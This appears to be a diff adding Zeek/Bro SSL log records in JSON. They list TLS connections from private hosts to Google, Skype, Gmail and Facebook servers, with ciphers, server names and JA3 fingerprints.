+{"ts":"2018-08-03T23:39:00.211603Z","uid":"CenBVK3N1Js5K07IP","id.orig_h":"192.168.0.53","id.orig_p":2434,"id.resp_h":"31.13.91.2","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.272371Z","uid":"CV8swz2nSNA2DkotZd","id.orig_h":"192.168.0.54","id.orig_p":51784,"id.resp_h":"104.40.141.94","id.resp_p":443,"server_name":"prod.tpc.skype.com","resumed":false,"established":false,"ja3":"2a458dd9c65afbcf591cd8c2a194b804"} +{"ts":"2018-08-03T23:39:00.307881Z","uid":"Cl9sq8OHHIUQuAOc4","id.orig_h":"192.168.0.54","id.orig_p":51883,"id.resp_h":"216.58.209.132","id.resp_p":443,"server_name":"www.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.383865Z","uid":"CDTWWY3ngR6JnQEaoj","id.orig_h":"192.168.0.54","id.orig_p":52036,"id.resp_h":"213.155.151.183","id.resp_p":443,"server_name":"talkgadget.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.358565Z","uid":"CHIuIJ3Vi4hgwc8w33","id.orig_h":"192.168.0.54","id.orig_p":51985,"id.resp_h":"213.155.151.187","id.resp_p":443,"server_name":"chrome.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.409201Z","uid":"C15OJB2ARu6CYM5mJe","id.orig_h":"192.168.0.54","id.orig_p":52090,"id.resp_h":"213.155.151.185","id.resp_p":443,"server_name":"safebrowsing-cache.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.212710Z","uid":"CeAtvG4tuLodsPT9x3","id.orig_h":"192.168.0.51","id.orig_p":37910,"id.resp_h":"213.155.151.180","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"safebrowsing.google.com","resumed":true,"established":false,"ja3":"01f79a7537bf2cb8b8e8f450d291c632"} +{"ts":"2018-08-03T23:39:00.238032Z","uid":"CAgeR6jihSIrMri02","id.orig_h":"192.168.0.53","id.orig_p":2510,"id.resp_h":"31.13.91.2","id.resp_p":443,"version":"TLSv10","cipher":"TLS_RSA_WITH_RC4_128_SHA","resumed":true,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.263340Z","uid":"CC6vtr2iCqppvmKM43","id.orig_h":"192.168.0.54","id.orig_p":51766,"id.resp_h":"213.155.151.187","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","resumed":false,"established":false} +{"ts":"2018-08-03T23:39:00.313914Z","uid":"CmKD0h345tTBzZnqZk","id.orig_h":"192.168.0.54","id.orig_p":51882,"id.resp_h":"137.116.224.167","id.resp_p":443,"server_name":"a.config.skype.com","resumed":false,"established":false,"ja3":"2a458dd9c65afbcf591cd8c2a194b804"} +{"ts":"2018-08-03T23:39:00.399964Z","uid":"COUqDK2vwH1sxmqQhe","id.orig_h":"192.168.0.51","id.orig_p":53461,"id.resp_h":"213.155.151.185","id.resp_p":443,"server_name":"safebrowsing-cache.google.com","resumed":false,"established":false,"ja3":"01f79a7537bf2cb8b8e8f450d291c632"} +{"ts":"2018-08-03T23:39:00.220194Z","uid":"CK0bJSlGMymz20499","id.orig_h":"192.168.0.54","id.orig_p":51683,"id.resp_h":"213.155.151.180","id.resp_p":443,"server_name":"talkgadget.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.260668Z","uid":"CudWi11EPUpiQcKwm1","id.orig_h":"192.168.0.54","id.orig_p":51765,"id.resp_h":"213.155.151.187","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:00.270844Z","uid":"CuKFGd1irQeTqkuKb5","id.orig_h":"192.168.0.54","id.orig_p":51796,"id.resp_h":"213.155.151.182","id.resp_p":443,"server_name":"clients4.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.336622Z","uid":"C0Pg2o2TlYpjZI3r32","id.orig_h":"192.168.0.54","id.orig_p":51917,"id.resp_h":"213.155.151.187","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"clients2.google.com","resumed":false,"established":false,"ja3":"e417b0731e0f2c81dc81ca57cb597b25"} +{"ts":"2018-08-03T23:39:00.336622Z","uid":"CngMAM20Y75Ov40r5e","id.orig_h":"192.168.0.53","id.orig_p":2627,"id.resp_h":"31.13.91.2","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.387265Z","uid":"C9h5s440Uwj6P8rLVk","id.orig_h":"192.168.0.54","id.orig_p":52048,"id.resp_h":"213.155.151.182","id.resp_p":443,"server_name":"clients4.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.397351Z","uid":"CuCd4643pUNRJQhyi3","id.orig_h":"192.168.0.54","id.orig_p":52056,"id.resp_h":"213.155.151.180","id.resp_p":443,"server_name":"safebrowsing.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.447961Z","uid":"CgEPv9LJAxCEQnb5d","id.orig_h":"192.168.0.53","id.orig_p":2915,"id.resp_h":"31.13.64.1","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.524040Z","uid":"CKaC5x28GUGpeZOwD7","id.orig_h":"192.168.0.54","id.orig_p":52329,"id.resp_h":"213.155.151.148","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"clients6.google.com","resumed":true,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.296446Z","uid":"CPsdYZ306VjDSI2aLf","id.orig_h":"192.168.0.54","id.orig_p":51842,"id.resp_h":"216.58.209.132","id.resp_p":443,"server_name":"www.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.321783Z","uid":"C0Llbq1ifokEtxlvDc","id.orig_h":"192.168.0.51","id.orig_p":37954,"id.resp_h":"213.155.151.180","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"safebrowsing.google.com","resumed":true,"established":false,"ja3":"01f79a7537bf2cb8b8e8f450d291c632"} +{"ts":"2018-08-03T23:39:00.377464Z","uid":"C7VU8sVuWs5zLM93i","id.orig_h":"192.168.0.54","id.orig_p":52025,"id.resp_h":"213.155.151.185","id.resp_p":443,"server_name":"safebrowsing-cache.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.504160Z","uid":"CPvh9012irkJJr23zc","id.orig_h":"192.168.0.54","id.orig_p":52285,"id.resp_h":"213.155.151.155","id.resp_p":443,"server_name":"chrome.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.319703Z","uid":"Cg1MlX2Itbho0QtPbj","id.orig_h":"192.168.0.54","id.orig_p":51885,"id.resp_h":"213.155.151.180","id.resp_p":443,"server_name":"safebrowsing.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.365318Z","uid":"ChQg8N3gaDlrtJM8w2","id.orig_h":"192.168.0.54","id.orig_p":52009,"id.resp_h":"216.58.209.133","id.resp_p":443,"server_name":"mail.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.390619Z","uid":"C4UUmw1BWqBnvqwQac","id.orig_h":"192.168.0.53","id.orig_p":2700,"id.resp_h":"31.13.64.1","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.441229Z","uid":"CCDnT11Ur6XZIytry9","id.orig_h":"192.168.0.54","id.orig_p":52163,"id.resp_h":"173.194.40.242","id.resp_p":443,"server_name":"www.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.860900Z","uid":"CorvZl1XyWVyhAyUSh","id.orig_h":"192.168.0.54","id.orig_p":52447,"id.resp_h":"213.155.151.181","id.resp_p":443,"server_name":"play.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.381129Z","uid":"CnzEDA3ha7GNJtH8g8","id.orig_h":"192.168.0.53","id.orig_p":2677,"id.resp_h":"31.13.64.1","id.resp_p":443,"version":"TLSv10","cipher":"TLS_RSA_WITH_RC4_128_SHA","resumed":false,"established":false} +{"ts":"2018-08-03T23:39:00.416556Z","uid":"CgsbLB4iMcyUJPBTtj","id.orig_h":"192.168.0.53","id.orig_p":2887,"id.resp_h":"31.13.64.1","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.861383Z","uid":"CEqx674rSMzRIf5Tx5","id.orig_h":"192.168.0.54","id.orig_p":52446,"id.resp_h":"213.155.151.181","id.resp_p":443,"server_name":"play.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:00.886770Z","uid":"Cdwuml3c3YC99kPTn1","id.orig_h":"192.168.0.54","id.orig_p":52496,"id.resp_h":"213.155.151.183","id.resp_p":443,"server_name":"clients4.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.332956Z","uid":"C4wo8n1mmt7kKTitl","id.orig_h":"192.168.0.54","id.orig_p":51940,"id.resp_h":"216.58.209.132","id.resp_p":443,"server_name":"www.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.393658Z","uid":"C7dQ2T37BpsWbBLwyg","id.orig_h":"192.168.0.54","id.orig_p":52045,"id.resp_h":"213.155.151.187","id.resp_p":443,"server_name":"clients3.google.com","resumed":false,"established":false,"ja3":"e417b0731e0f2c81dc81ca57cb597b25"} +{"ts":"2018-08-03T23:39:00.393658Z","uid":"CtMAyMhsuH9YNYgd","id.orig_h":"192.168.0.54","id.orig_p":52052,"id.resp_h":"213.155.151.155","id.resp_p":443,"server_name":"chrome.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.459461Z","uid":"CaYC8Ngrgv34YhVsj","id.orig_h":"192.168.0.54","id.orig_p":52188,"id.resp_h":"173.194.40.242","id.resp_p":443,"server_name":"www.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.280542Z","uid":"CvsDhy3TfIvUnigrvh","id.orig_h":"192.168.0.54","id.orig_p":51824,"id.resp_h":"216.58.209.101","id.resp_p":443,"server_name":"mail.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.401928Z","uid":"C4IvZh1s2smQ9XepQg","id.orig_h":"192.168.0.54","id.orig_p":52057,"id.resp_h":"213.155.151.185","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"safebrowsing-cache.google.com","resumed":true,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.841881Z","uid":"C2kkLs7xKWFln2AQ4","id.orig_h":"192.168.0.54","id.orig_p":52399,"id.resp_h":"216.58.209.133","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"mail.google.com","resumed":true,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.851972Z","uid":"CkmpBe1r2fbRb2wPl2","id.orig_h":"192.168.0.53","id.orig_p":3053,"id.resp_h":"31.13.93.3","id.resp_p":443,"version":"TLSv10","cipher":"TLS_RSA_WITH_RC4_128_SHA","resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.353073Z","uid":"Cwwm6q4oTQGPk7MF2c","id.orig_h":"192.168.0.54","id.orig_p":51972,"id.resp_h":"213.155.151.187","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"clients6.google.com","resumed":true,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:00.368324Z","uid":"Cytosx2v3zafw0SSc6","id.orig_h":"192.168.0.53","id.orig_p":2659,"id.resp_h":"31.13.64.1","id.resp_p":443,"version":"TLSv10","cipher":"TLS_RSA_WITH_RC4_128_SHA","resumed":false,"established":false,"cert_chain_fuids":["FyBA112fGV31EFqHgj","FlJgXAqvrzzr9edq"],"client_cert_chain_fuids":[],"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.429084Z","uid":"CXVyD43ldk0a5bgPj8","id.orig_h":"192.168.0.54","id.orig_p":52131,"id.resp_h":"213.155.151.180","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","resumed":false,"established":false} +{"ts":"2018-08-03T23:39:00.499911Z","uid":"C5UTr5uIZCx7SfBLl","id.orig_h":"192.168.0.54","id.orig_p":52289,"id.resp_h":"213.155.151.148","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.367292Z","uid":"C4Ajw44LHXaj6hSmaf","id.orig_h":"192.168.0.54","id.orig_p":52002,"id.resp_h":"213.155.151.180","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"talkgadget.google.com","resumed":true,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.392615Z","uid":"Cn8JLizT48yyN17We","id.orig_h":"192.168.0.54","id.orig_p":52050,"id.resp_h":"173.194.40.242","id.resp_p":443,"server_name":"www.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.503988Z","uid":"CQ35fCNQEOZ9wdGdi","id.orig_h":"192.168.0.54","id.orig_p":52307,"id.resp_h":"64.233.164.109","id.resp_p":993,"server_name":"imap.gmail.com","resumed":false,"established":false,"ja3":"1d095e68489d3c535297cd8dffb06cb9"} +{"ts":"2018-08-03T23:39:00.862670Z","uid":"C1gYZ4442k4MnFIf15","id.orig_h":"192.168.0.54","id.orig_p":52459,"id.resp_h":"213.155.151.148","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:00.268213Z","uid":"CpliUe2UNXPbuasokg","id.orig_h":"192.168.0.54","id.orig_p":51775,"id.resp_h":"213.155.151.182","id.resp_p":443,"server_name":"clients4.google.com","resumed":false,"established":false,"ja3":"e03fdb6b99211ce6d1ed8a21abf4b25b"} +{"ts":"2018-08-03T23:39:00.328973Z","uid":"CrFP7T1Xw0tC0wpOIi","id.orig_h":"192.168.0.51","id.orig_p":53430,"id.resp_h":"213.155.151.185","id.resp_p":443,"server_name":"safebrowsing-cache.google.com","resumed":false,"established":false,"ja3":"01f79a7537bf2cb8b8e8f450d291c632"} +{"ts":"2018-08-03T23:39:00.344044Z","uid":"CnEqlc6UqBLqUCuvg","id.orig_h":"192.168.0.54","id.orig_p":51953,"id.resp_h":"216.58.209.132","id.resp_p":443,"server_name":"www.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.521195Z","uid":"CPrzQE2WRid7qDqRmc","id.orig_h":"192.168.0.54","id.orig_p":52328,"id.resp_h":"213.155.151.148","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:00.396667Z","uid":"C1Yh802IzKWmq6wMpc","id.orig_h":"192.168.0.54","id.orig_p":52075,"id.resp_h":"213.155.151.148","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.411837Z","uid":"Cya51a3DfjdNf4K2h1","id.orig_h":"192.168.0.51","id.orig_p":37985,"id.resp_h":"213.155.151.180","id.resp_p":443,"server_name":"safebrowsing.google.com","resumed":false,"established":false,"ja3":"01f79a7537bf2cb8b8e8f450d291c632"} +{"ts":"2018-08-03T23:39:00.831551Z","uid":"Cz2CLf4q97ttLA1MPj","id.orig_h":"192.168.0.51","id.orig_p":58101,"id.resp_h":"213.155.151.151","id.resp_p":443,"server_name":"safebrowsing.google.com","resumed":false,"established":false,"ja3":"01f79a7537bf2cb8b8e8f450d291c632"} +{"ts":"2018-08-03T23:39:00.320753Z","uid":"CfRyXk3kh9B9gQMF77","id.orig_h":"192.168.0.54","id.orig_p":51920,"id.resp_h":"108.160.165.138","id.resp_p":443,"resumed":false,"established":false,"ja3":"8d0230b6ce881f161d1875364f4a156b"} +{"ts":"2018-08-03T23:39:00.892272Z","uid":"CXZBb42SQS0puFiape","id.orig_h":"192.168.0.54","id.orig_p":52507,"id.resp_h":"213.155.151.152","id.resp_p":443,"server_name":"talkgadget.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.365157Z","uid":"CLvQIb2plIyh2yY1pg","id.orig_h":"192.168.0.53","id.orig_p":2667,"id.resp_h":"31.13.64.1","id.resp_p":443,"version":"TLSv10","cipher":"TLS_RSA_WITH_RC4_128_SHA","resumed":true,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.931694Z","uid":"CZB6mt3hg7OuHXwsLb","id.orig_h":"192.168.0.54","id.orig_p":52615,"id.resp_h":"213.155.151.150","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.931694Z","uid":"CxI64B1XDhOFkJBWKh","id.orig_h":"192.168.0.54","id.orig_p":52621,"id.resp_h":"216.58.209.133","id.resp_p":443,"server_name":"mail.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.931694Z","uid":"CRClmfH2XJeUS6o9k","id.orig_h":"192.168.0.54","id.orig_p":52636,"id.resp_h":"216.58.209.133","id.resp_p":443,"server_name":"mail.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.378904Z","uid":"Ch9xl517dmkfODqzE2","id.orig_h":"192.168.0.51","id.orig_p":53449,"id.resp_h":"213.155.151.185","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"safebrowsing-cache.google.com","resumed":true,"established":false,"ja3":"01f79a7537bf2cb8b8e8f450d291c632"} +{"ts":"2018-08-03T23:39:00.404222Z","uid":"Clp3tc2ojZtDaaL3J2","id.orig_h":"192.168.0.54","id.orig_p":52071,"id.resp_h":"64.233.164.109","id.resp_p":993,"server_name":"imap.gmail.com","resumed":false,"established":false,"ja3":"1d095e68489d3c535297cd8dffb06cb9"} +{"ts":"2018-08-03T23:39:00.470057Z","uid":"CHNxYZ3Ij4uZICREg2","id.orig_h":"192.168.0.54","id.orig_p":52223,"id.resp_h":"213.155.151.183","id.resp_p":443,"server_name":"clients4.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:00.509799Z","uid":"CXu0c23YrPOTdIUSo9","id.orig_h":"192.168.0.54","id.orig_p":52314,"id.resp_h":"213.155.151.183","id.resp_p":443,"server_name":"clients4.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.838190Z","uid":"CFRpgQ2PcqTFlr57Je","id.orig_h":"192.168.0.53","id.orig_p":3032,"id.resp_h":"31.13.64.1","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.835412Z","uid":"CXqKgT2p22x8WMKynd","id.orig_h":"192.168.0.54","id.orig_p":52412,"id.resp_h":"213.155.151.148","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:00.875917Z","uid":"CokgyTzxNuiDZ6usb","id.orig_h":"192.168.0.54","id.orig_p":52472,"id.resp_h":"213.155.151.148","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"e417b0731e0f2c81dc81ca57cb597b25"} +{"ts":"2018-08-03T23:39:00.926548Z","uid":"CLSyIs350ahudqydUl","id.orig_h":"192.168.0.54","id.orig_p":52587,"id.resp_h":"216.58.209.133","id.resp_p":443,"server_name":"mail.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.951848Z","uid":"CYouN530CMDrusZcK6","id.orig_h":"192.168.0.54","id.orig_p":52668,"id.resp_h":"213.155.151.155","id.resp_p":443,"server_name":"safebrowsing-cache.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.977165Z","uid":"Curn9d15Ixlv2uZffd","id.orig_h":"192.168.0.54","id.orig_p":52721,"id.resp_h":"213.155.151.150","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:00.471354Z","uid":"CkyAWq1lVrJYZRe144","id.orig_h":"192.168.0.54","id.orig_p":52212,"id.resp_h":"213.155.151.151","id.resp_p":443,"server_name":"plus.google.com","resumed":false,"established":false,"ja3":"e03fdb6b99211ce6d1ed8a21abf4b25b"} +{"ts":"2018-08-03T23:39:00.875748Z","uid":"CJJZ6f2ZMVTva8Jopg","id.orig_h":"192.168.0.54","id.orig_p":52489,"id.resp_h":"213.155.151.150","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:00.936548Z","uid":"CKE0Ps3CdRrrupSc28","id.orig_h":"192.168.0.54","id.orig_p":52626,"id.resp_h":"74.125.205.189","id.resp_p":443,"server_name":"11.client-channel.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.987054Z","uid":"CqYI9RyPufCIjRM29","id.orig_h":"192.168.0.53","id.orig_p":3381,"id.resp_h":"31.13.93.3","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.892754Z","uid":"CC5pPB4tenU891Eimk","id.orig_h":"192.168.0.54","id.orig_p":52515,"id.resp_h":"213.155.151.155","id.resp_p":443,"server_name":"safebrowsing-cache.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.938402Z","uid":"CJmebl2oe1VLYH5Fg9","id.orig_h":"192.168.0.54","id.orig_p":52653,"id.resp_h":"216.58.209.133","id.resp_p":443,"server_name":"mail.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.953566Z","uid":"CO2QnM1qjDtrYRz1t8","id.orig_h":"192.168.0.54","id.orig_p":52681,"id.resp_h":"216.58.209.133","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"mail.google.com","resumed":true,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:01.019327Z","uid":"CjvbcK3BSV23pQtdak","id.orig_h":"192.168.0.54","id.orig_p":52823,"id.resp_h":"213.155.151.150","id.resp_p":443,"server_name":"safebrowsing.google.com","resumed":false,"established":false,"ja3":"e03fdb6b99211ce6d1ed8a21abf4b25b"} +{"ts":"2018-08-03T23:39:00.862921Z","uid":"C4SpFEIUnSWzm5XJd","id.orig_h":"192.168.0.54","id.orig_p":52456,"id.resp_h":"216.58.209.133","id.resp_p":443,"server_name":"mail.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.878061Z","uid":"CMWiqb4QYq8zvPYBTa","id.orig_h":"192.168.0.54","id.orig_p":52471,"id.resp_h":"213.155.151.183","id.resp_p":443,"server_name":"clients4.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:01.014723Z","uid":"Cp2mkc2WXAMdgmZAF1","id.orig_h":"192.168.0.54","id.orig_p":52835,"id.resp_h":"213.155.151.185","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","curve":"secp256r1","server_name":"play.google.com","resumed":false,"established":false,"cert_chain_fuids":["Fdq6xe4tHSxc5Ax0gk","FTs4hn3Y63UHaImJGj","FzA2Vg1sDTlv3k1f2h"],"client_cert_chain_fuids":[],"ja3":"e03fdb6b99211ce6d1ed8a21abf4b25b"} +{"ts":"2018-08-03T23:39:00.901413Z","uid":"Cjvacl17flClYBkjPi","id.orig_h":"192.168.0.54","id.orig_p":52547,"id.resp_h":"216.58.209.133","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"mail.google.com","resumed":true,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.987494Z","uid":"C4ZOGM3s1ZYKmj1eqj","id.orig_h":"192.168.0.54","id.orig_p":52745,"id.resp_h":"213.155.151.155","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"safebrowsing-cache.google.com","resumed":true,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.997665Z","uid":"C33GBV1OzvG8Iy10ve","id.orig_h":"192.168.0.51","id.orig_p":55025,"id.resp_h":"213.155.151.155","id.resp_p":443,"server_name":"safebrowsing-cache.google.com","resumed":false,"established":false,"ja3":"01f79a7537bf2cb8b8e8f450d291c632"} +{"ts":"2018-08-03T23:39:01.012843Z","uid":"Ces3wF22SIb4mvUMm6","id.orig_h":"192.168.0.53","id.orig_p":3408,"id.resp_h":"31.13.93.3","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:01.022941Z","uid":"CEnH1w3302mhtCbGA","id.orig_h":"192.168.0.53","id.orig_p":3432,"id.resp_h":"31.13.93.3","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:01.038129Z","uid":"C7nUO33lOXe4MZtC9k","id.orig_h":"192.168.0.54","id.orig_p":52861,"id.resp_h":"213.155.151.152","id.resp_p":443,"server_name":"talkgadget.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:01.016845Z","uid":"CeECm32HuVMA3qdI4c","id.orig_h":"192.168.0.53","id.orig_p":3416,"id.resp_h":"31.13.93.3","id.resp_p":443,"version":"TLSv10","cipher":"TLS_RSA_WITH_RC4_128_SHA","resumed":true,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} 